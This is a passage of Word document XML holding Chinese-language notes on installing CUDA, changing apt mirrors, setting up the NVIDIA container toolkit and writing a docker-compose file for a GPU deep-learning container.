    <w:p w14:paraId="50173D22" w14:textId="77777777" w:rsidR="00022A6E" w:rsidRDefault="00022A6E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>sudo apt-get -y install cuda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269118A5" w14:textId="77777777" w:rsidR="00022A6E" w:rsidRDefault="00022A6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>需要提前修改源，提高安装速度：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276B3CDF" w14:textId="77777777" w:rsidR="00022A6E" w:rsidRDefault="00022A6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>修改文件：</w:t>
      </w:r>
      <w:r>
        <w:t>/etc/apt/sources.list.d/cuda-ubuntu2204-x86_64.list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580B0310" w14:textId="77777777" w:rsidR="00022A6E" w:rsidRDefault="00022A6E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>#deb [signed-by=/usr/share/keyrings/cuda-archive-keyring.gpg] https://developer.download.nvidia.com/compute/cuda/repos/ubuntu2204/x86_64/ /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398164AA" w14:textId="77777777" w:rsidR="00022A6E" w:rsidRDefault="00022A6E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>deb [signed-by=/usr/share/keyrings/cuda-archive-keyring.gpg] https://developer.download.nvidia.cn/compute/cuda/repos/ubuntu2204/x86_64/ /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FF9E28" w14:textId="77777777" w:rsidR="00022A6E" w:rsidRDefault="00022A6E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>#deb [signed-by=/usr/share/keyrings/cuda-archive-keyring.gpg] https://mirrors.aliyun.com/nvidia-cuda/ubuntu2204/x86_64/ /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70633A8C" w14:textId="77777777" w:rsidR="00022A6E" w:rsidRDefault="00022A6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FBFAD1D" w14:textId="77777777" w:rsidR="00A31C83" w:rsidRPr="00022A6E" w:rsidRDefault="00A31C83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F15E04F" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Nvidia docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354B2871" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>nvidia docker tag</w:t>
      </w:r>
      <w:r>
        <w:t>说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5B46B4" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>CUDA image</w:t>
      </w:r>
      <w:r>
        <w:t>有三种风格，可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>NVIDIA</w:t>
      </w:r>
      <w:r>
        <w:t>公共集线器存储库获得。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB41E18" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>base:</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>CUDA 9.0</w:t>
      </w:r>
      <w:r>
        <w:t>开始，包含了部署预构建</w:t>
      </w:r>
      <w:r>
        <w:t>CUDA</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序的最低限度</w:t>
      </w:r>
      <w:r>
        <w:t>(libcudart)</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>如果你想手动选择你想要安装的</w:t>
      </w:r>
      <w:r>
        <w:t>CUDA</w:t>
      </w:r>
      <w:r>
        <w:t>包，请使用这个映像。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F322C3" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>runtime:</w:t>
      </w:r>
      <w:r>
        <w:t>通过添加</w:t>
      </w:r>
      <w:r>
        <w:t>CUDA</w:t>
      </w:r>
      <w:r>
        <w:t>工具包中的所有共享库扩展基本映像。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>如果您有一个使用多个</w:t>
      </w:r>
      <w:r>
        <w:t>CUDA</w:t>
      </w:r>
      <w:r>
        <w:t>库的预构建应用程序，请使用此图像。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6589547A" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>devel:</w:t>
      </w:r>
      <w:r>
        <w:t>通过添加编译器工具链、调试工具、头文件和静态库来扩展运行时映像。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>使用这个图像从源代码编译一个</w:t>
      </w:r>
      <w:r>
        <w:t>CUDA</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607AAAA7" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF1BCCE" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">nvidia-container-tools </w:t>
      </w:r>
      <w:r>
        <w:t>安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E51981" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>distribution=ubuntu22.04 \\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30104E91" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &amp;&amp; curl -fsSL &lt;https://nvidia.github.io/libnvidia-container/gpgkey&gt; | sudo gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg \\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA2EF4F" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &amp;&amp; curl -s -L &lt;https://nvidia.github.io/libnvidia-container/$distribution/libnvidia-container.list&gt; | \\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C3935A" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#g' | \\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F89BAB" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            sudo tee /etc/apt/sources.list.d/nvidia-container-toolkit.list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A78BCE5" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>由于设备系统为</w:t>
      </w:r>
      <w:r>
        <w:t>ubuntu22.10</w:t>
      </w:r>
      <w:r>
        <w:t>，这个官方源目前不支持，当前只是尝试一下，标准脚本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F38BDC" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>distribution=$(. /etc/os-release;echo $ID$VERSION_ID) \\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E495B9F" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &amp;&amp; curl -fsSL &lt;https://nvidia.github.io/libnvidia-container/gpgkey&gt; | sudo gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg \\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4CE7C3" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &amp;&amp; curl -s -L &lt;https://nvidia.github.io/libnvidia-container/$distribution/libnvidia-container.list&gt; | \\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1463E734" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#g' | \\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A974AE" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            sudo tee /etc/apt/sources.list.d/nvidia-container-toolkit.list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEE194B" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>执行安装命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4D232B" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sudo apt update </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194B090E" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>sudo apt install -y nvidia-container-toolkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA72F28" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>重启容器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC8FFE7" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>sudo systemctl restart docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200E09D3" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>官方参考地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId266" w:anchor="installation-guide" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/install-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:lastRenderedPageBreak/>
          <w:t>guide.html#installation-guide</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="559BB360" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>测试是否安装成功：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513D4DE7" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>docker run --rm --gpus all nvidia/cuda:12.0.1-devel-ubuntu22.04 nvidia-smi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E28391" w14:textId="7A357DA1" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18CF9864" wp14:editId="640A4CE9">
            <wp:extent cx="5274310" cy="2983230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="193092917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29170" name="图片 1" descr="文本&#10;&#10;描述已自动生成"/>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274310" cy="2983230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DE13B1" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>漂亮</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA621C0" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1969A249" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Nvidia docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048394C7" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>docker-compose.yaml</w:t>
      </w:r>
      <w:r>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EF49FE" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>version: '3'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F67BD9" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EFA2738" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBF850E" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="776051A2" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  dl-env:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4528B51A" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    build: ./</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B88D06" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    image: blingsec/deeplearn-env:latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5406EC34" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    container_name: deeplearn-env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A07C9B" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    #command: nvidia-smi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD9077F" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    deploy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34016E07" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E6C2AF" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        reservations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C779A1" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          devices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F920F53" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            - driver: nvidia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1162A41E" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              count: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103ED8E2" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              capabilities: [gpu]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5613229A" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3723593E" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      NVIDIA_DRIVER_CAPABILITIES: compute,utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62237D8F" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      NVIDIA_VISIBLE_DEVICES: all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0694AF38" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1112A9C6" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - "40022:22"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1407CDC6" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - "40080:80"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6DEB4A" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E83EDD" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - ./models:/data/models</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C07AFB" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    networks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583AA8BA" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - dl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D67D497" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    restart: always</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735389B5" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D6D153" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>networks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A293EA2" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  dl:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B54B2C0" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    driver: bridge</w:t>
      </w:r>
    </w:p>
